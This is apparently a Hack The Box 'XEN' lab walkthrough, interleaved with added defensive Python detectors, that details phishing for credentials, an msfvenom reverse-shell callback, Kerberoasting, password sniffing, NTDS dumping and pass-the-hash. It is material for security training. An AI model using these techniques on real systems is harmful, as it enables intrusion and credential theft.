htb-endgame-xen

Hack The Box – XEN (retired June 2020)

First I add the IP of the machine, 10.13.38.12, to /etc/hosts as xen.htb.

NMAP

As always, we start with an nmap scan.

E:\PENTEST>nmap -A -oN htb-endgame-xen 10.13.38.12
Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-09 14:41 W. Europe Summer Time
Stats: 0:00:43 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 66.67% done; ETC: 14:42 (0:00:11 remaining)
Nmap scan report for humongousretail.com (10.13.38.12)
Host is up (0.024s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
25/tcp open smtp
| fingerprint-strings:
| GenericLines, GetRequest:
| 220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL)
| sequence of commands
| sequence of commands
| Hello:
| 220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL)
| EHLO Invalid domain address.
| Help:
| 220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL)
| DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| NULL:
|_ 220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL)
| smtp-commands: CITRIX, SIZE 20480000, AUTH LOGIN, HELP,
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Humongous Retail
443/tcp open ssl/http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Humongous Retail
| ssl-cert: Subject: commonName=humongousretail.com
| Subject Alternative Name: DNS:humongousretail.com
| Not valid before: 2019-03-31T21:05:35
|_Not valid after: 2039-03-31T21:15:35
|_ssl-date: 2020-04-09T12:42:58+00:00; +9s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_WITH_MD5
|_ SSL2_DES_192_EDE3_CBC_WITH_MD5
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port25-TCP:V=7.70%I=7%D=4/9%Time=5E8F182C%P=i686-pc-windows-windows%r(N
SF:ULL,33,"220\x20ESMTP\x20MAIL\x20Service\x20ready\x20\(EXCHANGE\.HTB\.LO
SF:CAL\)\r\n")%r(Hello,55,"220\x20ESMTP\x20MAIL\x20Service\x20ready\x20\(E
SF:XCHANGE\.HTB\.LOCAL\)\r\n501\x20EHLO\x20Invalid\x20domain\x20address\.\
SF:r\n")%r(Help,6F,"220\x20ESMTP\x20MAIL\x20Service\x20ready\x20\(EXCHANGE
SF:\.HTB\.LOCAL\)\r\n211\x20DATA\x20HELO\x20EHLO\x20MAIL\x20NOOP\x20QUIT\x
SF:20RCPT\x20RSET\x20SAML\x20TURN\x20VRFY\r\n")%r(GenericLines,6F,"220\x20
SF:ESMTP\x20MAIL\x20Service\x20ready\x20\(EXCHANGE\.HTB\.LOCAL\)\r\n503\x2
SF:0Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20c
SF:ommands\r\n")%r(GetRequest,6F,"220\x20ESMTP\x20MAIL\x20Service\x20ready
SF:\x20\(EXCHANGE\.HTB\.LOCAL\)\r\n503\x20Bad\x20sequence\x20of\x20command
SF:s\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|general purpose|phone
Running (JUST GUESSING): Microsoft Windows 7|8|Phone|2008|8.1|Vista (91%)
OS CPE: cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
Aggressive OS guesses: Microsoft Windows Embedded Standard 7 (91%), Microsoft Windows 8.1 Update 1 (91%), Microsoft Windows Phone 7.5 or 8.0 (91%), Microsoft Windows 7 or Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 (90%), Microsoft Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 R2 or Windows 8.1 (90%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (90%), Microsoft Windows 7 (90%), Microsoft Windows 7 Professional or Windows 8 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 8s, deviation: 0s, median: 8s

TRACEROUTE (using port 443/tcp)
HOP RTT ADDRESS
1 24.00 ms 10.14.14.1
2 24.00 ms humongousretail.com (10.13.38.12)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.99 seconds

E:\PENTEST>

So we have HTTP and HTTPS on ports 80 and 443, and SMTP on port 25.

Overview of Web Services

Let's take a quick look at the web pages to see what we have. Port 80 redirected me to port 443, and the certificate presented for the site gave me a new domain name, humongousretail.com.

I didn’t have much to go on, so I decided to do some directory enumeration.

Directory Enumeration

I used wfuzz in this case because gobuster didn't come up with anything useful.

wfuzz --hc 404 -w raft-small-words.txt http://10.13.38.12/FUZZ

Web Directories

There were several other directories that seemed interesting, but the ones I wanted to look at were Remote and Jakarta.

Opening https://humongousretail.com/remote, I got the following.

Browsing https://humongousretail.com/jakarta, I got the following.

I had a look at these for some time to see if I could come up with anything useful; I dug deeper into the directories and searched for known exploits for the Citrix XenApp application. Knowing this environment is called XEN, I decided to concentrate my efforts on the remote directory rather than Jakarta. After spending some more time on this without result, I decided to investigate the SMTP service, since I had done exercises in the past where the (simulated) users were very responsive to mail.

SMTP Enumeration

I had the domain name of the company, so I decided to see if I could enumerate any email addresses and then somehow get a response from someone.

smtp-user-enum -M RCPT -U ./usernames.txt -D humongousretail.com -t 10.13.38.12

I found 4 addresses:

  • sales@humongousretail.com
  • it@humongousretail.com
  • marketing@humongousretail.com
  • legal@humongousretail.com

Now that I had these 4 addresses, I needed to make sure I could actually send mail through the server. I decided to use an internal sender address to try to get a response from someone.

User Response

To see if I was getting a response, I had a listener running to capture anything that may come through.

nc -nlvp 80

I then attempted a lot of different emails with a lot of different subjects, and eventually got a hit with the subject Remote. The idea was to get the users to click on my link. The session looked as follows:

telnet 10.13.38.12 25
helo humongousretail.com
MAIL FROM: it@hunongousretail.com
RCPT TO: sales@humongousretail.com
DATA
Subject: Remote Portal

Hi,
The URL for the remote portal has now been changed to http://10.14.15.106
Regards
IT
.
QUIT

I chose this approach because a mail from the IT department sent out to a group of people would hopefully get me something; users tend to trust an email coming from IT, or so you would think.

Once the email had been sent there was no immediate response, but 30 seconds later some data arrived at my listener: a user had clicked the link to the "new portal" and submitted their credentials.

I had a username of pmorgan and a password of Summer1Summer!. Although I knew that had worked, I sent the mail again to make sure I had it right, and got a response from a different user.

I now had another user, jmendes, with the password VivaBARC3L0N@!!!.

I kept this up to see if I could get any more responses and I had one more.

The last response gave me the user awardel with the password @M3m3ntoM0ri@. I now had 3 users:

pmorgan:Summer1Summer!
jmendes:VivaBARC3L0N@!!!
awardel:@M3m3ntoM0ri@

Citrix XenAPP

I had the 3 users and knew that they must work somewhere. I browsed to the remote site and entered the credentials of pmorgan.

And I now had access to a desktop.

I tried this for each user that I had, and each of them logged in successfully.

I clicked on the Desktop to access it and was asked to open the launch.ica file, which defaulted to opening with the Citrix Receiver Engine after I installed icaclientWeb_19.12.0.19_amd64.deb on Kali.

Once I had clicked OK, I was presented with a desktop. I browsed to the user's Desktop folder and found the 1st flag.

1 – XEN{wh0_n33d5_2f@?} Breach

Gaining a shell

Now that I had access to the desktops, I wanted a shell to see if I could elevate my privileges on them. I first made a note of all the users and the desktops they were assigned to.

I created the reverse shell payload I wanted so that I could get a Meterpreter session.

msfvenom --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.14.15.106 LPORT=10086 -f exe -o x86exploit.exe

I then proceeded to set up my msfconsole handler as follows.


Now that I had everything set up, I started SimpleHTTPServer so that I could download the payload onto the target.

python -m SimpleHTTPServer 80

I then browsed to my machine from the virtual desktop and downloaded the file.

I then ran the payload and got a Meterpreter shell.

Privilege Escalation on Desktop

Now that I had a meterpreter shell, I wanted to see if I could elevate my privileges.  I decided to use the local exploit suggester.

I first put my session in the background and started the suggester.

use post/multi/recon/local_exploit_suggester

Seeing the results from the suggester, I decided to use the AlwaysInstallElevated exploit.

use exploit/windows/local/always_install_elevated

I had successfully raised my privileges. I looked to see what was on the Administrator's Desktop and found the second flag.

2 – XEN{7ru573d_1n574ll3r5} Deploy

Further Enumeration

Now that I had a way inside the network and had seen the internal range 172.16.249.0/24, I wanted to perform a quick scan to identify hosts. To pivot into the internal network, I used a SOCKS proxy within msf.

use auxiliary/server/socks4a

Now that I had done this, I wanted to see which hosts were live on the internal network. Knowing the IPs of the desktops, I chose to scan only a small range, between .199 and .210.

I managed to find an additional 3 IPs:

  • 172.16.249.200 (DC)
  • 172.16.249.201 (Citrix)
  • 172.16.249.202 (NetScaler)

With a domain controller in reach, I decided to use a technique I had used in a previous engagement: Kerberoasting.

With the SYSTEM shell that I had earlier, I uploaded the Kerberoasting tool (Rubeus).

Further credentials

I now wanted to see if there were any further credentials that I could find.

PS C:\Users\pmorgan\Desktop> .\Rubeus.exe kerberoast /outfile:service_ticket.txt


______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v1.4.2


[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

[*] Searching the current domain for Kerberoastable users

[*] Found 1 user(s) to Kerberoast!

[*] SamAccountName : mturner
[*] DistinguishedName : CN=Mark Turner,OU=Contractors,DC=htb,DC=local
[*] ServicePrincipalName : MSSQLSvc/CITRIXTEST.HTB.LOCAL:1433
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash written to C:\Users\pmorgan\Desktop\service_ticket.txt

[*] Roasted hashes written to : C:\Users\pmorgan\Desktop\service_ticket.txt
PS C:\Users\pmorgan\Desktop> dir


Directory: C:\Users\pmorgan\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 4/4/2020 11:13 AM 7 cmd.bat
-ar-- 4/6/2019 11:11 PM 19 flag.txt
-a--- 2/20/2020 6:53 PM 41534 Invoke-Portscan.ps1
-a--- 3/26/2020 10:56 AM 16128568 netscan64.exe
-a--- 4/6/2020 8:57 PM 295 netscan64.lic
-a--- 4/6/2020 8:57 PM 39301 netscan64.xml
-a--- 2/20/2020 6:30 PM 770279 powerview-dev.ps1
-a--- 9/22/2019 10:20 AM 883600 putty.exe
-a--- 11/27/2019 2:17 PM 198144 Rubeus.exe
-a--- 4/6/2020 9:12 PM 2172 service_ticket.txt
-a--- 3/28/2020 11:17 AM 832512 SharpHound.exe
-a--- 3/28/2020 11:17 AM 973323 SharpHound.ps1
-a--- 4/6/2020 8:59 PM 32665 winPEAS.bat
-a--- 4/6/2020 8:59 PM 241152 winPEAS.exe

(To get a proper command prompt we use cmd.bat, which simply launches cmd.exe.)
PS C:\Users\pmorgan\Desktop> type cmd.bat
cmd.exe

PS C:\Users\pmorgan\Desktop> type service_ticket.txt 
$krb5tgs$23$*mturner$htb.local$MSSQLSvc [ticket hash truncated]

PS C:\Users\pmorgan\Desktop> copy "\\Client\D$\SharpHound.ps1" .
PS C:\Users\pmorgan\Desktop> Set-ExecutionPolicy -Scope CurrentUser
PS C:\Users\pmorgan\Desktop> Bypass
PS C:\Users\pmorgan\Desktop> .\Sharphound
PS C:\Users\pmorgan\Desktop> Import-Module .\SharpHound.ps1
PS C:\Users\pmorgan\Desktop> get-help Invoke-BloodHound
PS C:\Users\pmorgan\Desktop> Invoke-BloodHound -CollectionMethod All
PS C:\Users\pmorgan\Desktop> copy .\service_ticket.txt \\Client\D$\
PS C:\Users\pmorgan\Desktop> copy "\\Client\D$\netscan64.exe" .
PS C:\Users\pmorgan\Desktop>
PS C:\Users\pmorgan\Desktop> Import-Module .\powerview-dev.ps1
PS C:\Users\pmorgan\Desktop> Get-NetUser
PS C:\Users\pmorgan\Desktop> Get-NetUser | Ft samAccountName

I copied this ticket hash to a file named mturner so that I could run it through hashcat.

I exhausted all the password lists I had against it and decided to look up some hashcat rules online to see what I could come up with. I eventually found a ruleset with potential at https://github.com/NSAKEY/nsarules.git.

hashcat -m 13100 ./mturner rockyou.txt -r rules/_NSAKEY.v2.dive.rule --debug-mode=1 --debug-file=matched.rule --force -O

After several hours, I eventually got a hit on the password.

We now know that the password for mturner is 4install!
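The Rubeus run above shows why this worked: the SPN owner mturner only supports RC4_HMAC, so a crackable RC4 service ticket could be requested by any domain user. From the defender's side, the same request leaves a Windows Security Event 4769 on the domain controller. The following is an added example, not from the original write-up, that flags Kerberoast-style 4769 records: RC4 service tickets for user accounts (not krbtgt or machine accounts), RC4 requests against accounts that support AES (the downgrade Rubeus mentions), and one requester hitting several SPN owners in a row. The events and the AES-support table are constructed; only the account name mturner comes from the page.

```python
"""Flag Kerberoast-style service-ticket requests in Windows Security Event 4769 data."""
from collections import defaultdict

RC4_HMAC = "0x17"   # TicketEncryptionType Rubeus requests by default ("RC4_HMAC_DEFAULT")

# Constructed stand-in for msDS-SupportedEncryptionTypes pulled from AD (None = unknown).
ACCOUNT_SUPPORTS_AES = {"mturner": False, "sqlsvc-test": True}

def classify(event):
    """Return the reasons one 4769 event looks like Kerberoasting ([] if benign)."""
    svc = event["ServiceName"]
    if event["Status"] != "0x0":
        return []                                 # failed requests yield no crackable ticket
    if svc.lower() == "krbtgt" or svc.endswith("$"):
        return []                                 # TGT renewals and machine SPNs are normal noise
    reasons = []
    if event["TicketEncryptionType"] == RC4_HMAC:
        reasons.append("rc4-service-ticket")
        if ACCOUNT_SUPPORTS_AES.get(svc):
            reasons.append("aes-capable-account-downgraded-to-rc4")  # /tgtdeleg-style downgrade
    return reasons

def kerberoast_report(events, burst_threshold=3):
    """Return (per-event findings, requesters that hit >= burst_threshold distinct SPN owners)."""
    findings = []
    per_requester = defaultdict(set)
    for ev in events:
        reasons = classify(ev)
        if not reasons:
            continue
        findings.append({"requester": ev["TargetUserName"], "spn_owner": ev["ServiceName"],
                         "src": ev["IpAddress"], "reasons": reasons})
        per_requester[(ev["TargetUserName"], ev["IpAddress"])].add(ev["ServiceName"])
    bursts = {k: sorted(v) for k, v in per_requester.items() if len(v) >= burst_threshold}
    return findings, bursts

def _ev(user, svc, etype, src="::ffff:172.16.249.205", status="0x0"):
    """Build one constructed 4769 EventData record (source IPs are made up)."""
    return {"TargetUserName": user, "ServiceName": svc, "TicketEncryptionType": etype,
            "IpAddress": src, "Status": status}

# Constructed sample: one desktop session requesting several service tickets
SAMPLE_EVENTS = [
    _ev("pmorgan@HTB.LOCAL", "krbtgt", "0x17"),        # TGT renewal: ignored
    _ev("pmorgan@HTB.LOCAL", "DC$", "0x12"),           # machine account: ignored
    _ev("pmorgan@HTB.LOCAL", "mturner", "0x17"),       # RC4-only SPN owner: flagged
    _ev("pmorgan@HTB.LOCAL", "sqlsvc-test", "0x17"),   # AES-capable but RC4 requested: downgrade
    _ev("pmorgan@HTB.LOCAL", "web-svc", "0x17"),       # unknown account, RC4: flagged
    _ev("jmendes@HTB.LOCAL", "sqlsvc-test", "0x12", src="::ffff:172.16.249.206"),  # AES: benign
    _ev("awardel@HTB.LOCAL", "mturner", "0x17", src="::ffff:172.16.249.207",
        status="0x6"),                                 # non-zero status: no ticket issued
]

if __name__ == "__main__":
    found, bursts = kerberoast_report(SAMPLE_EVENTS)
    for f in found:
        print(f)
    print("bursts:", bursts)
```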

SMB Access

Now that I had the new credentials, I looked around a little more to see what else I could find. I eventually found SMB on 172.16.249.201 and decided to try the credentials there.

proxychains smbmap -u mturner -p '4install!' -d htb.local -H 172.16.249.201

This showed that we had read access to the files located in the Citrix$ share. I connected to it with smbclient to see what was inside.

proxychains smbclient \\\\172.16.249.201\\Citrix$ -U htb.local\\mturner

I was presented with some interesting files. The 2 of interest at this point are flag.txt and private.ppk.

I downloaded these files and was able to read the next flag.

3 – XEN{l364cy_5pn5_ftw} Ghost

PuTTY Key Conversion

Now that I had a PuTTY private key file, I had a look at its contents to see if it hinted at anything.

It seems this could be used in PuTTY but has a passphrase on it too. I needed to crack the passphrase before I could proceed, so I converted the key with putty2john.

putty2john private.ppk > private.hash

Now that I had this file in a readable format for john, I tried to crack the password.

After several hours, all my password lists came up empty; I was unable to crack the passphrase with what I had. I decided to look elsewhere for something I could use as a password list generator, and found a keyboard-walk generator that seemed interesting at https://github.com/hashcat/kwprocessor

./kwp -o passes basechars/tiny.base keymaps/en-gb.keymap routes/2-to-32-max-5-directionchanges.route


Once I had the password list generated, I ran it through john to try to crack the passphrase again.

john -w=./passes private.hash

Now that I knew the passphrase, I could convert the key for use on my system. To do this, I used puttygen.

puttygen private.ppk -O private-openssh -o id_rsa

I now had a key file that I could use.

Access to NetScaler

During the information gathering I had accumulated many user IDs, and I tried all of them with the private key against SSH on the NetScaler. I then quickly found that the default username on these devices is nsroot, and attempted to log in with that.

proxychains ssh -i id_rsa nsroot@172.16.249.202

Now that I had access to the NetScaler as root of the device, I hunted around to see if I could find anything. After a while of searching, I did not come up with anything useful. Remembering that the device is essentially a firewall and router, I decided to listen to the traffic passing through it, recalling a specific article at https://hackertarget.com/tcpdumpexamples/.

I tried this to see if I would get any results.

tcpdump -s 0 -A -n -l | egrep -i "POST /|pwd=|passwd=|password=|Host:"


4 – XEN{bu7_ld4p5_15_4_h455l3} Camouflage

LDAP

Knowing that I had root on this box, I wanted to run some additional tests to see what other traffic was passing through it. The previous flag seemed to suggest LDAP was in use, so I set up tcpdump to capture to a file.

tcpdump -w capture.pcap

I now had to transfer the file back to my machine for investigation.  I used scp for this.

proxychains scp -i id_rsa nsroot@172.16.249.202:/root/capture.pcap .

I then opened this file within Wireshark to see what I could find.

Following the previous hint, I filtered for the LDAP traffic and found a password.

The password I found was #S3rvice#@cc, used by the netscaler-svc account.
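The password was readable because the NetScaler authenticated to the domain with an LDAP simple bind over plain TCP/389, where the BindRequest carries the password as a raw OCTET STRING. The following is an added example, not from the write-up, that decodes the BER structure Wireshark shows for such a bind and reports every cleartext bind in a reassembled port-389 payload, which is a useful check to run over captures before (and after) enforcing LDAPS or signing. The PDUs are constructed; the DN and password are placeholders, not values from the target.

```python
"""Decode LDAP BindRequest PDUs from a TCP/389 payload and report simple (cleartext) binds."""

def read_tlv(buf, pos):
    """Decode one BER TLV at buf[pos]; return (tag, value, position after it)."""
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:                     # long form: low 7 bits give the count of length octets
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length

def parse_bind_requests(payload):
    """Return one dict per BindRequest in payload; other LDAP operations are skipped."""
    results, pos = [], 0
    while pos < len(payload):
        tag, msg, pos = read_tlv(payload, pos)
        if tag != 0x30:                   # every LDAPMessage is a SEQUENCE
            continue
        _, msgid, p = read_tlv(msg, 0)
        op_tag, op, _ = read_tlv(msg, p)
        if op_tag != 0x60:                # [APPLICATION 0] constructed = BindRequest
            continue
        _, version, p = read_tlv(op, 0)
        _, name, p = read_tlv(op, p)
        auth_tag, cred, _ = read_tlv(op, p)
        simple = auth_tag == 0x80         # [0] simple: password is a plain OCTET STRING
        results.append({"message_id": int.from_bytes(msgid, "big"),
                        "version": int.from_bytes(version, "big"),
                        "name": name.decode(), "simple": simple,
                        "password": cred.decode() if simple else None})
    return results

def cleartext_binds(payload):
    """Simple binds that carry a password (anonymous simple binds have an empty one)."""
    return [b for b in parse_bind_requests(payload) if b["simple"] and b["password"]]

# --- helpers that build the constructed sample payload (short-form lengths only) ---
def tlv(tag, value):
    if len(value) >= 0x80:
        raise ValueError("sample builder only handles short-form lengths")
    return bytes([tag, len(value)]) + value

def bind_request(msgid, dn, auth):
    op = tlv(0x02, b"\x03") + tlv(0x04, dn.encode()) + auth      # version 3, name, auth choice
    return tlv(0x30, tlv(0x02, bytes([msgid])) + tlv(0x60, op))

SAMPLE_PAYLOAD = (
    bind_request(1, "CN=netscaler-svc,CN=Users,DC=htb,DC=local", tlv(0x80, b"Placeholder-Pass-1"))
    + bind_request(2, "", tlv(0x80, b""))                                   # anonymous bind
    + bind_request(3, "", tlv(0xA3, tlv(0x04, b"GSS-SPNEGO") + tlv(0x04, b"\x60\x00")))  # SASL
    + tlv(0x30, tlv(0x02, b"\x01") + tlv(0x61, tlv(0x0A, b"\x00") + tlv(0x04, b"")
                                           + tlv(0x04, b"")))             # BindResponse, skipped
)

if __name__ == "__main__":
    for b in cleartext_binds(SAMPLE_PAYLOAD):
        print(f"cleartext bind msg {b['message_id']}: {b['name']!r}")
```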

msf > use auxiliary/server/socks4a
msf > set srvport 8888
msf > route add 172.16.249.0 255.255.255.0 1
msf > exploit
root@kali:~/htb/xen# proxychains GetUserSPNs.py -request -dc-ip 172.16.249.200 HTB.LOCAL/netscaler-svc:#S3rvice#@cc
ProxyChains-3.1 (http://proxychains.sf.net)
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

|S-chain|-<>-127.0.0.1:8888-<><>-172.16.249.200:389-<><>-OK
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon 
---------------------------------- ------- --------------------------------------- -------------------------- --------------------------
MSSQLSvc/CITRIXTEST.HTB.LOCAL:1433 mturner CN=Deployment,OU=Groups,DC=htb,DC=local 2019-02-13 23:23:48.796612 2019-04-10 22:14:57.105936

|S-chain|-<>-127.0.0.1:8888-<><>-172.16.249.200:88-<><>-OK
|S-chain|-<>-127.0.0.1:8888-<><>-172.16.249.200:88-<><>-OK
|S-chain|-<>-127.0.0.1:8888-<><>-172.16.249.200:88-<><>-OK
$krb5tgs$23$*mturner$HTB.LOCAL$MSSQLSvc/CITRIXTEST.HTB.LOCAL~1433*$30e2233e1b0123f3c7579d9f7a2384fb$ [ticket hash truncated]
root@kali:~/xen# proxychains smbmap -u mturner -p '4install!' -d htb.local -H 172.16.249.201
ProxyChains-3.1 (http://proxychains.sf.net)
[+] Finding open SMB ports....
|S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.201:445-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.201:445-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.201:445-<><>-OK
[+] User SMB session establishd on 172.16.249.201...
[+] IP: 172.16.249.201:445 Name: 172.16.249.201 
Disk Permissions
---- -----------
ADMIN$ NO ACCESS
C$ NO ACCESS
Citrix$ READ ONLY
IPC$ NO ACCESS
ISOs NO ACCESS
ISOs-TEST NO ACCESS
root@kali:~/xen#
root@kali:~/xen# proxychains smbclient \\\\172.16.249.201\\Citrix$ -U htb.local\\mturner
ProxyChains-3.1 (http://proxychains.sf.net)
WARNING: The "syslog" option is deprecated
|S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.201:445-<><>-OK
Enter HTB.LOCAL\mturner's password: 4install!
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed May 8 18:12:51 2019
.. D 0 Wed May 8 18:12:51 2019
Deploying-XenServer-5.6.pdf A 997001 Tue Feb 12 18:21:10 2019
flag.txt AR 20 Sun Mar 31 11:25:10 2019
private.ppk A 1486 Wed May 8 18:21:51 2019
XenServer-5-6-SHG.pdf A 1747587 Tue Feb 12 18:21:32 2019

10485247 blocks of size 4096. 6344443 blocks available

Doppelganger

A doppelganger is a non-biologically related look-alike (Wikipedia). This hinted that I should look back at the other accounts active on the domain. I got a shell on the desktop again and looked up the domain details.

I was looking for an account that might resemble the netscaler-svc account I had found.

After all, I had tried this account in so many different places to access different resources, and none were successful.

net user /domain

After a few attempts at usernames, I discovered that backup-svc had the same password as the NetScaler service account; the two accounts shared one password. This was our doppelganger. I then tried to log in to the domain controller using WinRM through proxychains, because I knew this account was a member of the Backup Operators group, which generally has access.

proxychains ruby winrm_shell_with_upload.rb


root@kali:~/xen# proxychains ruby winrmshell2withupload.rb 
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.200:5985-<><>-OK
PS htb\backup-svc@DC Documents> 
PS htb\backup-svc@DC Desktop> type flag.txt
XEN{y_5h4r3d_p@55w0Rd5?} 
PS htb\backup-svc@DC Desktop>

I looked on the Desktop of backup-svc and found the next flag.

5 – XEN{y_5h4r3d_p@55w0Rd5?} Doppelganger

Privileges

Now that I was on the box, I wanted to see what privileges I had, to understand what else could be achieved by simply logging in through WinRM.

whoami /priv

This was interesting. It seems I had a few privileges, including backup and restore (SeBackupPrivilege and SeRestorePrivilege). That seemed obvious, though, with the account being named backup-svc.

I first tried to access the Administrator Desktop and was denied access.

From this I knew it had to be done with the backup privileges. I had recently done an exercise at work on retrieving the Active Directory database to extract the hashes. This is something I do on a regular basis, so I knew I would have to create a shadow copy of the drive to even attempt to get at the NTDS.dit, since the live file is locked.

I looked at all the usual methods of creating a shadow copy, including vssadmin and wbadmin. I then found a presentation that covered doing this with diskshadow: https://github.com/decoderit/whoamiprivHackinparis2019/blob/master/whoamiprivParis_Split.pdf. I wanted RDP access to the machine and therefore set up a port forward to give me access.

portfwd add -l 3389 -r 172.16.249.200 -p 3389

I first tried to open an RDP session to the machine using Remmina. To get a little further, I decided to use xfreerdp through proxychains instead of Remmina.

Install freerdp-x11:

sudo apt-get install freerdp-x11
root@kali:~# proxychains xfreerdp /v:172.16.249.200 /u:backup-svc 
ProxyChains-3.1 (http://proxychains.sf.net)
[03:37:43:732] [6460:6461] [INFO][com.freerdp.client.common.cmdline] - loading channelEx cliprdr
|S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.200:3389-<><>-OK
Password: #S3rvice#@cc
[03:37:58:008] [6460:6461] [INFO][com.freerdp.gdi] - Local framebuffer format PIXEL_FORMAT_BGRX32
[03:37:58:008] [6460:6461] [INFO][com.freerdp.gdi] - Remote framebuffer format PIXEL_FORMAT_RGB16
[03:37:58:120] [6460:6461] [INFO][com.winpr.clipboard] - initialized POSIX local file subsystem

And I was given the RDP access I was looking for.

I now decided to run through diskshadow to see if I could create a shadow copy of the drive.

Shadow Copies

diskshadow
set context persistent nowriters
add volume c: alias dmwong
create
expose %dmwong% z:

Once I had created the shadow copy, I copied the files out of it using the cmdlets found at https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug.

I opened PowerShell and imported the 2 modules.

Copy-FileSeBackupPrivilege z:\Windows\NTDS\ntds.dit c:\temp\ndts.dit
reg save hklm\system c:\temp\system.bak

Now that I had these files, I downloaded them onto my system for offline processing.

Domain Admin

Now that I had these files offline, I needed to extract the hashes.

python /opt/impacket/examples/secretsdump.py -ntds ndts.dit -system system.bak LOCAL

This provided me with all the hashes from the Active Directory database. With those in hand, I used the Pass-the-Hash technique to gain access to the domain controller as Administrator.

proxychains python /opt/impacket/examples/wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:822601ccd7155f47cd955b94af1558be Administrator@172.16.249.200

6 – XEN{d3r1v471v3_d0m41n_4dm1n} Owned
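Two findings in this chain, the doppelganger (backup-svc reusing the netscaler-svc password) and the full NTDS dump, come together in one defensive check: once an organisation has its own secretsdump-style export, identical NT hashes reveal shared passwords across accounts, and that is how a service-account password leaking from one device becomes Backup Operators access on the DC. The following is an added example, not from the write-up, that parses Impacket's `domain\user:rid:lmhash:nthash:::` lines, groups accounts by NT hash and rates shared-hash groups by the privileged memberships the auditor supplies. All lines, hashes and the group table are constructed placeholders; only the account names come from the page.

```python
"""Audit a secretsdump-style NTDS export for accounts that share an NT hash."""
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of an empty password (LM disabled)
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of an empty password

# Constructed: privileged memberships the auditor already knows (e.g. from BloodHound).
PRIVILEGED = {"backup-svc": "Backup Operators", "Administrator": "Domain Admins"}

def parse_dump(text):
    """Return {account: nthash} for user accounts in a secretsdump listing."""
    users = {}
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue                             # headers, cleartext and Kerberos-key lines
        account = parts[0].split("\\")[-1]       # drop the 'domain\' prefix
        if account.endswith("$"):
            continue                             # machine accounts rotate their own passwords
        users[account] = parts[3].lower()
    return users

def shared_hashes(users):
    """Group accounts by NT hash; keep only hashes used by more than one account."""
    by_hash = defaultdict(list)
    for account, nt in users.items():
        by_hash[nt].append(account)
    return {nt: sorted(accts) for nt, accts in by_hash.items() if len(accts) > 1}

def audit(text):
    """Return shared-password findings, highest severity first."""
    findings = []
    for nt, accts in shared_hashes(parse_dump(text)).items():
        priv = [f"{a} ({PRIVILEGED[a]})" for a in accts if a in PRIVILEGED]
        findings.append({"hash": nt, "accounts": accts,
                         "empty_password": nt == EMPTY_NT,
                         "privileged": priv,
                         "severity": "high" if priv else "medium"})
    return sorted(findings, key=lambda f: f["severity"])   # "high" sorts before "medium"

# Constructed sample export; the NT hashes are placeholders, not real values.
SAMPLE_DUMP = f"""\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
htb.local\\Administrator:500:{EMPTY_LM}:00000000000000000000000000000001:::
htb.local\\Guest:501:{EMPTY_LM}:{EMPTY_NT}:::
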